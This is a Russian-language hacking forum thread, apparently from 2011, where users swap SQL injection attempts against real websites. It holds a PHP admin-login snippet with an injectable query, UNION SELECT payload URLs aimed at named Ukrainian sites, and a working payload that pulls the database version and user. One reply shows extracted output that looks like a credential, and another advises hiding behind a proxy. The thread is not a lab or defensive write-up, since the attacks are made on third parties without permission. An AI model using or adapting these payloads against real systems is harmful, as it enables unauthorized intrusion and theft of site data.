03.12.2011, 19:39
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от trololoman96
можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...
Ничего ты тут не сделаешь
UPD
Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )
|
|
|
03.12.2011, 20:10
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM admin WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]NumRows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]FetchArray[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_pass[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'acplogin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'acppass'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"admin.php"[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"admin.php?err=pError"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
все портит эта кавычка |
|
|
|
03.12.2011, 23:43
|
|
Новичок
Регистрация: 01.11.2009
Сообщений: 0
С нами:
8697664
Репутация:
0
|
|
Vbulletin 4.1.7
Код:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&='
Можно ли из этого что-то извлечь? |
|
|
|
04.12.2011, 00:16
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами:
8784803
Репутация:
257
|
|
Сообщение от SHADOW785
Vbulletin 4.1.7
Код:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&='
Можно ли из этого что-то извлечь? Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user
|
|
|
|
04.12.2011, 01:08
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Код:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Не шарю как вывести |
|
|
|
04.12.2011, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от shadowrun
Код:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Не шарю как вывести http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?
|
|
|
|
04.12.2011, 01:13
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от Gorev
http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...
|
|
|
|
04.12.2011, 01:15
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от shadowrun
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...
natasha:0444730b0844225c
что именно понять то?
|
|
|
|
04.12.2011, 01:20
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от Gorev
natasha:0444730b0844225c
что именно понять то?
бляяяя Я не увидел где оно выводит .
Gorev, спасибо!
|
|
|
|
04.12.2011, 02:13
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Код:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Сообщение от None
Найдено достаточно много товаров, пожалуйста уточните поисковый запрос
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
